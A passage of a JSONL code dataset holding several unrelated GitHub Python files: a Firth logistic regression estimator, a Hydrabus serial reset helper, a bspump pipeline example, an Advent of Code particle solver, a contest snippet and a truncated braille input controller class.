7]\r\nins_sort(args)\r\nargs = [0.45, 0.76, 0.32, 0.11, 0.69, 0.45]\r\nbucket_sort(args, 2)\r\nprint(args)","repo_name":"rdrf2838/Algorithms","sub_path":"sorting/bucket_sort.py","file_name":"bucket_sort.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"7804274718","text":"import warnings\nfrom copy import deepcopy\nfrom importlib.resources import open_text\nfrom math import sqrt\n\nimport numpy as np\nfrom scipy.linalg import lapack\nfrom scipy.special import expit\nfrom scipy.stats import chi2, norm\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nfrom sklearn.exceptions import ConvergenceWarning\nfrom 
sklearn.preprocessing import LabelEncoder\nfrom sklearn.utils.multiclass import check_classification_targets\nfrom sklearn.utils.validation import check_is_fitted\nfrom tabulate import tabulate\n\n\nclass FirthLogisticRegression(BaseEstimator, ClassifierMixin):\n \"\"\"\n Logistic regression with Firth's bias reduction method.\n\n This is based on the implementation in the `logistf` R package. Please see the\n `logistf` reference and Heinze & Schemper (2002) for details about the procedure.\n\n Parameters\n ----------\n max_iter\n The maximum number of Newton-Raphson iterations.\n max_halfstep\n The maximum number of step-halvings in one Newton-Raphson iteration.\n max_stepsize\n The maximum step size - for each coefficient, the step size is forced to\n be less than max_stepsize.\n pl_max_iter\n The maximum number of Newton-Raphson iterations for finding profile likelihood\n confidence intervals.\n pl_max_halfstep\n The maximum number of step-halvings in one iteration for finding profile\n likelihood confidence intervals.\n pl_max_stepsize\n The maximum step size while finding PL confidence intervals.\n tol\n Convergence tolerance for stopping.\n fit_intercept\n Specifies if intercept should be added.\n skip_pvals\n If True, p-values will not be calculated. Calculating the p-values can be\n time-consuming if `wald=False` since the fitting procedure is repeated for each\n coefficient.\n skip_ci\n If True, confidence intervals will not be calculated. Calculating the confidence\n intervals via profile likelihoood is time-consuming.\n alpha\n Significance level (confidence interval = 1-alpha). 0.05 as default for 95% CI.\n wald\n If True, uses Wald method to calculate p-values and confidence intervals.\n test_vars\n Index or list of indices of the variables for which to calculate confidence\n intervals and p-values. If None, calculate for all variables. This option has\n no effect if wald=True.\n\n Attributes\n ----------\n bse_\n Standard errors of the coefficients.\n classes_\n A list of the class labels.\n ci_\n The fitted profile likelihood confidence intervals.\n coef_\n The coefficients of the features.\n intercept_\n Fitted intercept. If `fit_intercept = False`, the intercept is set to zero.\n loglik_\n Fitted penalized log-likelihood.\n n_iter_\n Number of Newton-Raphson iterations performed.\n pvals_\n p-values calculated by penalized likelihood ratio tests.\n\n References\n ----------\n Firth D (1993). Bias reduction of maximum likelihood estimates.\n Biometrika 80, 27–38.\n\n Heinze G, Schemper M (2002). A solution to the problem of separation in logistic\n regression. 
Statistics in Medicine 21: 2409-2419.\n \"\"\"\n\n def __init__(\n self,\n max_iter=25,\n max_halfstep=0,\n max_stepsize=5,\n pl_max_iter=100,\n pl_max_halfstep=0,\n pl_max_stepsize=5,\n tol=0.0001,\n fit_intercept=True,\n skip_pvals=False,\n skip_ci=False,\n alpha=0.05,\n wald=False,\n test_vars=None,\n ):\n self.max_iter = max_iter\n self.max_stepsize = max_stepsize\n self.max_halfstep = max_halfstep\n self.pl_max_iter = pl_max_iter\n self.pl_max_halfstep = pl_max_halfstep\n self.pl_max_stepsize = pl_max_stepsize\n self.tol = tol\n self.fit_intercept = fit_intercept\n self.skip_pvals = skip_pvals\n self.skip_ci = skip_ci\n self.alpha = alpha\n self.wald = wald\n self.test_vars = test_vars\n\n def _more_tags(self):\n return {\"binary_only\": True}\n\n def _validate_input(self, X, y):\n if self.max_iter < 0:\n raise ValueError(\n f\"Maximum number of iterations must be positive; \"\n f\"got max_iter={self.max_iter}\"\n )\n if self.max_halfstep < 0:\n raise ValueError(\n f\"Maximum number of step-halvings must >= 0; \"\n f\"got max_halfstep={self.max_iter}\"\n )\n if self.tol < 0:\n raise ValueError(\n f\"Tolerance for stopping criteria must be positive; got tol={self.tol}\"\n )\n X, y = self._validate_data(X, y, dtype=np.float64, ensure_min_samples=2)\n check_classification_targets(y)\n\n self.classes_ = np.unique(y)\n if len(self.classes_) != 2:\n raise ValueError(f\"Got {len(self.classes_)} - only 2 classes supported.\")\n y = LabelEncoder().fit_transform(y).astype(X.dtype, copy=False)\n\n return X, y\n\n def fit(self, X, y):\n X, y = self._validate_input(X, y)\n if self.fit_intercept:\n X = np.hstack((X, np.ones((X.shape[0], 1))))\n\n self.coef_, self.loglik_, self.n_iter_ = _firth_newton_raphson(\n X, y, self.max_iter, self.max_stepsize, self.max_halfstep, self.tol\n )\n\n self.bse_ = _bse(X, self.coef_)\n\n if not self.skip_ci:\n if not self.wald:\n self.ci_ = _profile_likelihood_ci(\n X=X,\n y=y,\n fitted_coef=self.coef_,\n full_loglik=self.loglik_,\n max_iter=self.pl_max_iter,\n max_stepsize=self.pl_max_stepsize,\n max_halfstep=self.pl_max_halfstep,\n tol=self.tol,\n alpha=self.alpha,\n test_vars=self.test_vars,\n )\n else:\n self.ci_ = _wald_ci(self.coef_, self.bse_, self.alpha)\n else:\n self.ci_ = np.full((self.coef_.shape[0], 2), np.nan)\n\n # penalized likelihood ratio tests\n if not self.skip_pvals:\n if not self.wald:\n self.pvals_ = _penalized_lrt(\n self.loglik_,\n X,\n y,\n self.max_iter,\n self.max_stepsize,\n self.max_halfstep,\n self.tol,\n self.test_vars,\n )\n\n else:\n self.pvals_ = _wald_test(self.coef_, self.bse_)\n else:\n self.pvals_ = np.full(self.coef_.shape[0], np.nan)\n\n if self.fit_intercept:\n self.intercept_ = self.coef_[-1]\n self.coef_ = self.coef_[:-1]\n else:\n self.intercept_ = 0\n\n return self\n\n def summary(self, xname=None, tablefmt=\"simple\"):\n \"\"\"\n Prints a summary table.\n\n Parameters\n ----------\n xname\n Names for the X variables. Default is x1, x2, ... Must match the number of\n parameters in the model.\n tablefmt\n `tabulate` table format for output. 
Please see the documentation for\n `tabulate` for options.\n \"\"\"\n check_is_fitted(self)\n if xname and len(xname) != len(self.coef_):\n raise ValueError(\n f\"Length of xname ({len(xname)}) does not match the number of \"\n f\"parameters in the model ({len(self.coef_)})\"\n )\n\n if not xname:\n xname = [f\"x{i}\" for i in range(1, len(self.coef_) + 1)]\n\n coef = list(self.coef_)\n if self.fit_intercept:\n xname.append(\"Intercept\")\n coef.append(self.intercept_)\n\n headers = [\n \"\",\n \"coef\",\n \"std err\",\n f\"[{self.alpha/2}\",\n f\"{1-self.alpha/2}]\",\n \"p-value\",\n ]\n table = zip(xname, coef, self.bse_, self.ci_[:, 0], self.ci_[:, 1], self.pvals_)\n table = tabulate(table, headers, tablefmt=tablefmt)\n table += \"\\n\\n\"\n table += f\"Log-Likelihood: {round(self.loglik_, 4)}\\n\"\n table += f\"Newton-Raphson iterations: {self.n_iter_}\\n\"\n print(table)\n if self.fit_intercept:\n xname.pop()\n return\n\n def decision_function(self, X):\n check_is_fitted(self)\n X = self._validate_data(X, reset=False)\n scores = X @ self.coef_ + self.intercept_\n return scores\n\n def predict(self, X):\n decision = self.decision_function(X)\n if len(decision.shape) == 1:\n indices = (decision > 0).astype(int)\n else:\n indices = decision.argmax(axis=1)\n return self.classes_[indices]\n\n def predict_proba(self, X):\n decision = self.decision_function(X)\n if decision.ndim == 1:\n decision = np.c_[-decision, decision]\n proba = expit(decision)\n return proba\n\n\ndef _firth_newton_raphson(X, y, max_iter, max_stepsize, max_halfstep, tol, mask=None):\n # see logistf reference manual for explanation of procedure\n coef = np.zeros(X.shape[1])\n for iter in range(1, max_iter + 1):\n preds = expit(X @ coef)\n XW = _get_XW(X, preds, mask)\n\n fisher_info_mtx = XW.T @ XW\n hat = _hat_diag(XW)\n U_star = np.matmul(X.T, y - preds + np.multiply(hat, 0.5 - preds))\n step_size = np.linalg.lstsq(fisher_info_mtx, U_star, rcond=None)[0]\n # if mask:\n # step_size[mask] = 0\n\n # step-halving\n mx = np.max(np.abs(step_size)) / max_stepsize\n if mx > 1:\n step_size = step_size / mx # restrict to max_stepsize\n coef_new = coef + step_size\n preds_new = expit(X @ coef_new)\n loglike = _loglikelihood(X, y, preds)\n loglike_new = _loglikelihood(X, y, preds_new)\n steps = 0\n while loglike < loglike_new:\n step_size *= 0.5\n coef_new = coef + step_size\n preds_new = expit(X @ coef_new)\n loglike_new = _loglikelihood(X, y, preds_new)\n steps += 1\n if steps == max_halfstep:\n warning_msg = \"Step-halving failed to converge.\"\n warnings.warn(warning_msg, ConvergenceWarning, stacklevel=2)\n return coef_new, -loglike_new, iter\n\n if iter > 1 and np.linalg.norm(coef_new - coef) < tol:\n return coef_new, -loglike_new, iter\n\n coef += step_size\n warning_msg = (\n \"Firth logistic regression failed to converge. 
Try increasing max_iter.\"\n )\n warnings.warn(warning_msg, ConvergenceWarning, stacklevel=2)\n return coef, -loglike_new, max_iter\n\n\ndef _loglikelihood(X, y, preds):\n # penalized log-likelihood\n XW = _get_XW(X, preds)\n fisher_info_mtx = XW.T @ XW\n penalty = 0.5 * np.log(np.linalg.det(fisher_info_mtx))\n return -1 * (np.sum(y * np.log(preds) + (1 - y) * np.log(1 - preds)) + penalty)\n\n\ndef _get_XW(X, preds, mask=None):\n # mask is 1-indexed because 0 == None\n rootW = np.sqrt(preds * (1 - preds))\n XW = rootW[:, np.newaxis] * X\n\n # is this equivalent??\n # https://github.com/georgheinze/logistf/blob/master/src/logistf.c#L150-L159\n if mask is not None:\n XW[:, mask] = 0\n return XW\n\n\ndef _get_aug_XW(X, preds, hats):\n rootW = np.sqrt(preds * (1 - preds) * (1 + hats))\n XW = rootW[:, np.newaxis] * X\n return XW\n\n\ndef _hat_diag(XW):\n # Get diagonal elements of the hat matrix\n qr, tau, _, _ = lapack.dgeqrf(XW, overwrite_a=True)\n Q, _, _ = lapack.dorgqr(qr, tau, overwrite_a=True)\n hat = np.einsum(\"ij,ij->i\", Q, Q)\n return hat\n\n\ndef _bse(X, coefs):\n # se in logistf is diag(object$var) ^ 0.5, where var is the covariance matrix,\n # which is the inverse of the observed fisher information matrix\n # https://stats.stackexchange.com/q/68080/343314\n preds = expit(X @ coefs)\n XW = _get_XW(X, preds)\n fisher_info_mtx = XW.T @ XW\n return np.sqrt(np.diag(np.linalg.pinv(fisher_info_mtx)))\n\n\ndef _penalized_lrt(\n full_loglik, X, y, max_iter, max_stepsize, max_halfstep, tol, test_vars\n):\n if test_vars is None:\n test_var_indices = range(X.shape[1])\n elif isinstance(test_vars, int): # single index\n test_var_indices = [test_vars]\n else: # list, tuple, or set of indices\n test_var_indices = sorted(test_vars)\n\n pvals = []\n for mask in test_var_indices:\n _, null_loglik, _ = _firth_newton_raphson(\n X,\n y,\n max_iter,\n max_stepsize,\n max_halfstep,\n tol,\n mask,\n )\n pvals.append(_lrt(full_loglik, null_loglik))\n if len(pvals) < X.shape[1]:\n pval_array = np.full(X.shape[1], np.nan)\n for idx, test_var_idx in enumerate(test_var_indices):\n pval_array[test_var_idx] = pvals[idx]\n return pval_array\n return np.array(pvals)\n\n\ndef _lrt(full_loglik, null_loglik):\n # in logistf: 1-pchisq(2*(fit.full$loglik-fit.i$loglik),1)\n lr_stat = 2 * (full_loglik - null_loglik)\n p_value = chi2.sf(lr_stat, df=1)\n return p_value\n\n\ndef _predict(X, coef):\n preds = expit(X @ coef)\n np.clip(preds, a_min=1e-15, a_max=1 - 1e-15, out=preds)\n return preds\n\n\ndef _profile_likelihood_ci(\n X,\n y,\n fitted_coef,\n full_loglik,\n max_iter,\n max_stepsize,\n max_halfstep,\n tol,\n alpha,\n test_vars,\n):\n LL0 = full_loglik - chi2.ppf(1 - alpha, 1) / 2\n lower_bound = []\n upper_bound = []\n if test_vars is None:\n test_var_indices = range(fitted_coef.shape[0])\n elif isinstance(test_vars, int): # single index\n test_var_indices = [test_vars]\n else: # list, tuple, or set of indices\n test_var_indices = sorted(test_vars)\n for side in [-1, 1]:\n # for coef_idx in range(fitted_coef.shape[0]):\n for coef_idx in test_var_indices:\n coef = deepcopy(fitted_coef)\n for iter in range(1, max_iter + 1):\n preds = _predict(X, coef)\n loglike = -_loglikelihood(X, y, preds)\n XW = _get_XW(X, preds)\n hat = _hat_diag(XW)\n XW = _get_aug_XW(X, preds, hat) # augmented data using hat diag\n fisher_info_mtx = XW.T @ XW\n U_star = np.matmul(X.T, y - preds + np.multiply(hat, 0.5 - preds))\n # https://github.com/georgheinze/logistf/blob/master/src/logistf.c#L780-L781\n inv_fisher = 
np.linalg.pinv(fisher_info_mtx)\n tmp1x1 = U_star @ np.negative(inv_fisher) @ U_star\n underRoot = (\n -2\n * ((LL0 - loglike) + 0.5 * tmp1x1)\n / (inv_fisher[coef_idx, coef_idx])\n )\n lambda_ = 0 if underRoot < 0 else side * sqrt(underRoot)\n U_star[coef_idx] += lambda_\n\n step_size = np.linalg.lstsq(fisher_info_mtx, U_star, rcond=None)[0]\n mx = np.max(np.abs(step_size)) / max_stepsize\n if mx > 1:\n step_size = step_size / mx # restrict to max_stepsize\n coef += step_size\n loglike_old = deepcopy(loglike)\n\n for halfs in range(1, max_halfstep + 1):\n preds = _predict(X, coef)\n loglike = -_loglikelihood(X, y, preds)\n if (abs(loglike - LL0) < abs(loglike_old - LL0)) and loglike > LL0:\n break\n step_size *= 0.5\n coef -= step_size\n if abs(loglike - LL0) <= tol:\n if side == -1:\n lower_bound.append(coef[coef_idx])\n else:\n upper_bound.append(coef[coef_idx])\n break\n if abs(loglike - LL0) > tol:\n if side == -1:\n lower_bound.append(np.nan)\n else:\n upper_bound.append(np.nan)\n warning_msg = (\n f\"Non-converged PL confidence limits - max number of \"\n f\"iterations exceeded for variable x{coef_idx}. Try \"\n f\"increasing pl_max_iter.\"\n )\n warnings.warn(warning_msg, ConvergenceWarning, stacklevel=2)\n bounds = np.column_stack([lower_bound, upper_bound])\n if len(lower_bound) < fitted_coef.shape[0]:\n ci = np.full([fitted_coef.shape[0], 2], np.nan)\n for idx, test_var_idx in enumerate(test_var_indices):\n ci[test_var_idx] = bounds[idx]\n return ci\n\n return bounds\n\n\ndef _wald_ci(coef, bse, alpha):\n lower_ci = coef + norm.ppf(alpha / 2) * bse\n upper_ci = coef + norm.ppf(1 - alpha / 2) * bse\n return np.column_stack([lower_ci, upper_ci])\n\n\ndef _wald_test(coef, bse):\n # 1 - pchisq((beta^2/vars), 1), in our case bse = vars^0.5\n return chi2.sf(np.square(coef) / np.square(bse), 1)\n\n\ndef load_sex2():\n \"\"\"\n Load the sex2 dataset from `logistf`.\n\n Returns\n -------\n X\n sex2 data as numpy array\n y\n sex2 `case` target column\n feature_names\n List of feature names\n\n References\n ----------\n Cytel Inc., (2010) LogXact 9 user manual, Cambridge, MA:Cytel Inc\n \"\"\"\n with open_text(\"firthlogist.datasets\", \"sex2.csv\") as sex2:\n X = np.loadtxt(sex2, skiprows=1, delimiter=\",\")\n y = X[:, 0]\n X = X[:, 1:]\n feature_names = [\"age\", \"oc\", \"vic\", \"vicl\", \"vis\", \"dia\"]\n return X, y, feature_names\n\n\ndef load_endometrial():\n \"\"\"\n Load the endometrial cancer dataset analyzed in Heinze and Schemper (2002). The data\n was originally provided by Dr E. Asseryanis from the Vienna University Medical\n School\n\n Returns\n -------\n X\n endometrial data as numpy array\n y\n endometrial `HG` target column\n feature_names\n List of feature names\n\n References\n ----------\n Agresti, A (2015). Foundations of Linear and Generalized Linear Models.\n Wiley Series in Probability and Statistics.\n\n Heinze G, Schemper M (2002). A solution to the problem of separation in logistic\n regression. 
Statistics in Medicine 21: 2409-2419.\n \"\"\"\n with open_text(\"firthlogist.datasets\", \"endometrial.csv\") as sex2:\n X = np.loadtxt(sex2, skiprows=1, delimiter=\",\")\n y = X[:, -1]\n X = X[:, :-1]\n feature_names = [\"NV\", \"PI\", \"EH\"]\n return X, y, feature_names\n","repo_name":"jzluo/firthlogist","sub_path":"firthlogist/firthlogist.py","file_name":"firthlogist.py","file_ext":"py","file_size_in_byte":18581,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"29950582035","text":"import serial\n\nfrom hydrabus_framework.utils.logger import Logger\nfrom hydrabus_framework.utils.hb_generic_cmd import hb_reset, hb_close, hb_connect\n\n\n__author__ = \"Jordan Ovrè \"\n\n\ndef reset_hb(hbf_instance):\n \"\"\"\n Return hydrabus into console mode.\n :param hbf_instance: Hydrabus framework instance (self).\n :return: Nothing.\n \"\"\"\n logger = Logger()\n hydrabus_cfg = hbf_instance.config['HYDRABUS']\n if hydrabus_cfg['port'] is None or hydrabus_cfg['port'] == '-':\n logger.handle('port is not set on the configuration (setc command)', Logger.ERROR)\n else:\n try:\n serial_instance = hb_connect(device=hydrabus_cfg['port'], baudrate=115200, timeout=1)\n except serial.SerialException as e:\n logger.handle(\"could not open port {!r}: {}\".format(hydrabus_cfg['port'], e), logger.ERROR)\n return\n except UserWarning as err:\n logger.handle(\"{}\".format(err), Logger.ERROR)\n return\n if isinstance(serial_instance, serial.Serial):\n hb_reset(serial_instance)\n hb_close(serial_instance)\n logger.handle(\"Reset sequence successfully sent to Hydrabus...\", Logger.SUCCESS)\n else:\n logger.handle(\"Unable to reset Hydrabus due to connection error...\", Logger.ERROR)\n","repo_name":"hydrabus-framework/framework","sub_path":"hydrabus_framework/core/command/reset_hb.py","file_name":"reset_hb.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"38"} +{"seq_id":"12972364587","text":"import logging\n\nimport time\n\nimport bspump\nimport bspump.common\nimport bspump.random\nimport bspump.trigger\n\n##\n\n\nL = logging.getLogger(__name__)\n\n\n##\n\n\nclass MyApplication(bspump.BSPumpApplication):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tsvc = self.get_service(\"bspump.PumpService\")\n\t\tsvc.add_pipeline(MyPipeline(self))\n\n\nclass MyPipeline(bspump.Pipeline):\n\tdef __init__(self, app, pipeline_id=None):\n\t\tsuper().__init__(app, pipeline_id)\n\t\tupper_bound = int(time.time())\n\t\tlower_bound = upper_bound - 100500\n\t\tself.build(\n\t\t\tbspump.random.RandomSource(app, self, choice=['a', 'b', 'c'], config={\n\t\t\t\t'number': 5\n\t\t\t}).on(bspump.trigger.OpportunisticTrigger(app, chilldown_period=10)),\n\n\t\t\tbspump.random.RandomEnricher(app, self, config={\n\t\t\t\t'field': '@timestamp',\n\t\t\t\t'lower_bound': lower_bound,\n\t\t\t\t'upper_bound': upper_bound\n\t\t\t}),\n\t\t\tbspump.common.PPrintProcessor(app, self),\n\t\t\tbspump.random.RandomDrop(app, self),\n\t\t\tbspump.common.PPrintSink(app, self)\n\t\t)\n\n\nif __name__ == '__main__':\n\tapp = MyApplication()\n\tapp.run()\n","repo_name":"LibertyAces/BitSwanPump","sub_path":"examples/bspump-random.py","file_name":"bspump-random.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"38"} +{"seq_id":"29539264897","text":"import math\nimport re\nfrom collections import defaultdict\nfrom itertools import 
combinations\nfrom operator import attrgetter\n\nfrom dataclasses import dataclass\n\n\n@dataclass(hash=True)\nclass Vector:\n x: int\n y: int\n z: int\n\n @property\n def distance(self):\n return abs(self.x) + abs(self.y) + abs(self.z)\n \n\ndef solve_quadratic(p1, p2, v1, v2, a1, a2):\n a = (a1 - a2) / 2\n b = (v1 - v2) + a\n c = p1 - p2\n discriminant = (b ** 2) - (4 * a * c)\n if discriminant < 0:\n # no solutions\n return ()\n if discriminant == 0:\n return (-b / (2 * a)),\n return (\n (-b + math.sqrt(discriminant)) / (2 * a),\n (-b - math.sqrt(discriminant)) / (2 * a)\n )\n\ndef solve_linear(p1, p2, v1, v2):\n return (p2 - p1) / (v1 - v2)\n\n\ndef solve(p1, p2, v1, v2, a1, a2):\n \"\"\"Find the positive integer points in time where P1 and P2 intersect\n \n Returns a set with points in time.\n \n \"\"\"\n if a1 == a2:\n ts = solve_linear(p1, p2, v1, v2),\n else:\n ts = solve_quadratic(p1, p2, v1, v2, a1, a2)\n return {int(round(t)) for t in ts if t > 0 and math.isclose(t, round(t))}\n\n\n@dataclass(hash=True)\nclass Particle:\n id: int\n p: Vector\n v: Vector\n a: Vector\n\n @classmethod\n def from_line(cls, idx, line, _d=re.compile(r'-?\\d+')):\n px, py, pz, vx, vy, vz, ax, ay, az = map(int, _d.findall(line))\n return cls(idx, Vector(px, py, pz), Vector(vx, vy, vz), Vector(ax, ay, az))\n \n def __and__(self, other):\n # find if two particles will collide in a future point in time\n solutions = None\n for c in 'xyz':\n p1, p2, v1, v2, a1, a2 = (\n getattr(getattr(ob, v), c) for v in 'pva'\n for ob in (self, other))\n if a1 == a2 and v1 == v2:\n # parallel paths, always matching if starting position is equal\n if p1 == p2:\n continue\n # positions not equal, will never cross\n return False, None\n if solutions is None:\n solutions = solve(p1, p2, v1, v2, a1, a2)\n else:\n solutions &= solve(p1, p2, v1, v2, a1, a2)\n if not solutions:\n return False, None\n return True, min(solutions)\n\n\ndef read_particles(lines):\n return [Particle.from_line(i, l) for i, l in enumerate(lines)]\n\n\ndef find_closest(particles):\n # Assumption: the lowest absolute acceleration and velocity will win\n return min(particles, key=lambda p: (p.a.distance, p.v.distance, p.p.distance))\n\n\ndef eliminate_collisions(particles):\n collisions = defaultdict(set)\n for p1, p2 in combinations(particles, 2):\n collide, time = p1 & p2\n if not collide:\n continue\n collisions[time] |= {p1, p2}\n\n eliminated = None\n for time, collided in sorted(collisions.items()):\n if not eliminated:\n eliminated = set(collided)\n else:\n for p1, p2 in combinations(collided - eliminated, 2):\n if (p1 & p2)[0]:\n eliminated |= {p1, p2}\n return len(particles) - len(eliminated)\n\ntest_particles = read_particles('''p=< 3,0,0>, v=< 2,0,0>, a=<-1,0,0>\np=< 4,0,0>, v=< 0,0,0>, a=<-2,0,0>\n'''.splitlines())\nassert find_closest(test_particles).id == 0\n\ntest_particles = read_particles('''p=<-6,0,0>, v=< 3,0,0>, a=< 0,0,0> \np=<-4,0,0>, v=< 2,0,0>, a=< 0,0,0>\np=<-2,0,0>, v=< 1,0,0>, a=< 0,0,0>\np=< 3,0,0>, v=<-1,0,0>, a=< 0,0,0>\n'''.splitlines())\nassert eliminate_collisions(test_particles) == 1\n\nwith open('inputs/day20.txt') as day20:\n particles = read_particles(day20)\n\nprint('Part 1:', find_closest(particles).id)\n\nprint('Part 2:', eliminate_collisions(particles))\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/Day 20.py","file_name":"Day 20.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} 
+{"seq_id":"35322899393","text":"# Accepted\n\nqtd_alunos, min_pessoas = list(map(int, input().split()))\nhorario_alunos = list(map(int, input().split()))\n\nc = 0\nfor h in horario_alunos:\n if(h <= 0):\n c +=1\n\nif(c >= min_pessoas):\n print(\"YES\")\nelse:\n print(\"NO\")\n\n# c = 0\n# for h in horario_alunos:\n# if(h >= 0):\n# c +=1\n#\n# if(c >= min_pessoas):\n# print(\"YES\")\n# else:\n# print(\"NO\")\n","repo_name":"rafanthx13/competitive-programming","sub_path":"marathon-codes/Maratonas/SAP Contest/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40812277395","text":"from CUBExceptions import *\nfrom component_control.Translator import *\nfrom BrailleKeyboard import main as bk_main\nimport logging\nimport multiprocessing as mp\nimport threading\nimport tty\nimport sys\nimport termios\n\nINPUT_MODES = [\"BKEYBOARD\", \"KEYBOARD\", \"FILE\"]\n\nFILE_LANGUAGES = [\"ENG\", \"UEB\", \"BKB\"]\n\n\nclass Input:\n \"\"\"Functional Class to represent input into the CUB Control system\n\n Attributes: mode - Mode of input selected for operation\n runFlag - Flag to pause and start input operation\n exit - Flag to signal the input thread to finish input\n cub_pipe - Pipe used by the CUB thread to communicate to the Input thread\n input_cub_pipe - Pipe used by the Input thread to communicate to the CUB thread\n BKeyboard_pipe - Pipe used by the Braille Keyboard process to communicate to the Input thread\n input_pipe_BKB - Pipe used by the Input thread to communicate to the Braille Keyboard process\n p_BKeyboard - Running process of the Braille keyboard input program\n f_stdin - File of the systems standard input\n terminal_old - Settings of the terminal before input mode was entered\n inFilename - File name of the input file for FILE input mode\n inFileLang - Language/Format of the input file (Allows for pre-translated Braille text files)\n inFile - File opened for file input\n inputlogFilename - File name of the logging file for the input characters\n inputlogFile - File opened for logging input characters\n translation_logFilename - File name of the logging file for the translated input characters\n translationlogFile - File opened for logging translated input characters\n\n Methods: thread_in() -\n start_input() - Sets the run Flag to true to enable the operation of the Input thread\n pause_input() - Sets the run Flag to false to pause the operation of the Input thread\n close() - Sets the exit flag to true to signal for the Input thread to close\n send() - Sends a message to the input thread\n recv() - Receives the oldest sent message from the input thread\n \"\"\"\n\n def __init__(self, input_mode=\"KEYBOARD\", filename=\"\", file_language=\"ENG\", inputlog=\"cub_input_log.txt\",\n translation_log=\"cub_translation_log.txt\"):\n \"\"\"Creates an abstraction object of the Embosser module for the CUB\n\n :param input_mode: Parameter to select the input mode to be used for input\n :param filename: Optional parameter to define the input file to read the characters from\n :param file_language: Optional parameter to select the language/format for the input file (default is English)\n :param inputlog: Optional parameter to select the logging file for the read input\n :param translation_log: Optional parameter to select the logging file for the translated input\n \"\"\"\n logging.info(f\"Setting up Input in mode: {input_mode}\")\n # Input mode to be ran, one of the items 
in INPUT_MODES\n        self.mode = input_mode\n        # Run flag starts unset; input waits until told to start taking input\n        self.runFlag = threading.Event()\n        # Exit flag starts as False; setting it to True makes the thread complete its operation\n        self.exit = False\n\n        # Communication pipes:\n        # cub_pipe is the CUB's pipe for communication with the input thread\n        # BKeyboard_pipe is the Braille Keyboard's pipe for communication with the input thread\n        # input_pipe_cub and input_pipe_BKeyboard are the Input thread's pipes for communication with the CUB and\n        # Braille keyboard threads respectively\n        self.cub_pipe, self.input_pipe_cub = mp.Pipe()\n        self.BKeyboard_pipe, self.input_pipe_BKeyboard = mp.Pipe()\n        # Braille keyboard process\n        self.p_BKeyboard = None\n\n        # File name for the Input File\n        self.inFilename = filename\n        # Format/Language of the Input file\n        self.inFileLang = file_language\n        # File attribute to store link to input file\n        self.inFile = None\n\n        # File name for the input logging file\n        self.inputlogFilename = inputlog\n        # Link to the input logging file\n        self.inputlogFile = None\n        # File name for the translated input logging file\n        self.translation_logFilename = translation_log\n        # Link to the translated input logging file\n        self.translationlogFile = None\n\n        # Get a pointer to the standard in system file\n        self.f_stdin = sys.stdin.fileno()\n        # Save a copy of terminal settings to be restored once input is complete\n        self.terminal_old = termios.tcgetattr(self.f_stdin)\n\n    def thread_in(self):\n        \"\"\"Entry Point for the CUB Input component thread to begin execution\n\n        :return: None\n        \"\"\"\n        try:\n            logging.debug(\"Input thread Started\")\n            # Run component startup procedure\n            self.__startup()\n            # Run component loop\n            self.__run()\n\n        except InitialisationError as err:\n            self.close()\n            self.__output_cub(f\"{err.component} ERROR: {err.message}\")\n        except CUBClose as close:\n            self.__output_cub(f\"Close Signalled from {close.exit_point} - {close.message}\")\n        except CommunicationError as comm:\n            self.close()\n            self.__output_cub(f\"{comm.component} ERROR: {comm.message} - MSG: {comm.errorInput}\")\n        except OperationError as op:\n            self.close()\n            self.__output_cub(f\"{op.component} ERROR: {op.message} - OP: {op.operation}\")\n        except Exception as ex:\n            self.__output_cub(f\"Undefined Input ERROR: {ex}\")\n        finally:\n            # Clean up\n            if self.inFile is not None:\n                self.inFile.close()\n            termios.tcsetattr(self.f_stdin, termios.TCSADRAIN, self.terminal_old)\n\n            # Notify CUB of closure\n            self.__output_cub(\"END OF INPUT\")\n\n            # Close Braille Keyboard process if still alive\n            if self.p_BKeyboard is not None and self.p_BKeyboard.is_alive():\n                self.input_pipe_BKeyboard.send(\"CLOSE\")\n                self.p_BKeyboard.join(timeout=2)\n\n    def __startup(self):\n        \"\"\"Initialises Input functions depending on input mode\n\n        :return: None\n        \"\"\"\n        logging.info(\"Initialising input method\")\n        try:\n            self.inputlogFile = open(self.inputlogFilename, 'w')\n            self.inputlogFile.write(\"Log file of the CUB Input\\n\")\n            self.translationlogFile = open(self.translation_logFilename, 'w')\n            self.translationlogFile.write(\"Log file of the CUB Translated Input\\n\")\n        except IOError:\n            raise InitialisationError(\"CUBInput\", f\"Unable to open logging files - {self.inputlogFilename}, {self.translation_logFilename}\")\n        # -----------\n        # File Input\n        # -----------\n        if self.mode == \"FILE\" and self.inFilename != \"\":\n            try:\n                self.inFile = open(self.inFilename, \"r\")\n                logging.info(f\"CUBInput opened file with name {self.inFilename}\")\n            except IOError:\n                raise InitialisationError(\"CUBInput\", f\"Unable to open file with name - {self.inFilename}\")\n        # -----------------\n        # Braille Keyboard\n        # -----------------\n        elif self.mode == \"BKEYBOARD\":\n            try:\n                # Start Process at main function of BrailleKeyboard program\n                self.p_BKeyboard = mp.Process(target=bk_main, kwargs={'pipe': self.BKeyboard_pipe})\n                self.p_BKeyboard.start()\n                logging.info(\"Connecting to Braille keyboard for input\")\n            except AttributeError:\n                raise InitialisationError(\"CUBInput\", \"Unable to start Braille Keyboard Process\")\n\n        # ---------\n        # Keyboard\n        # ---------\n        elif self.mode == \"KEYBOARD\":\n            logging.info(\"Connecting to keyboard for input\")\n\n        else:\n            raise InitialisationError(\"CUBInput\", f\"Invalid Input Mode - {self.mode}\")\n        self.__output_cub(\"ACK\")\n\n    def __run(self):\n        # Wait until main thread signals to begin input\n        self.runFlag.wait()\n\n        # Check that exit was not signalled while waiting\n        if not self.exit:\n            if self.mode == 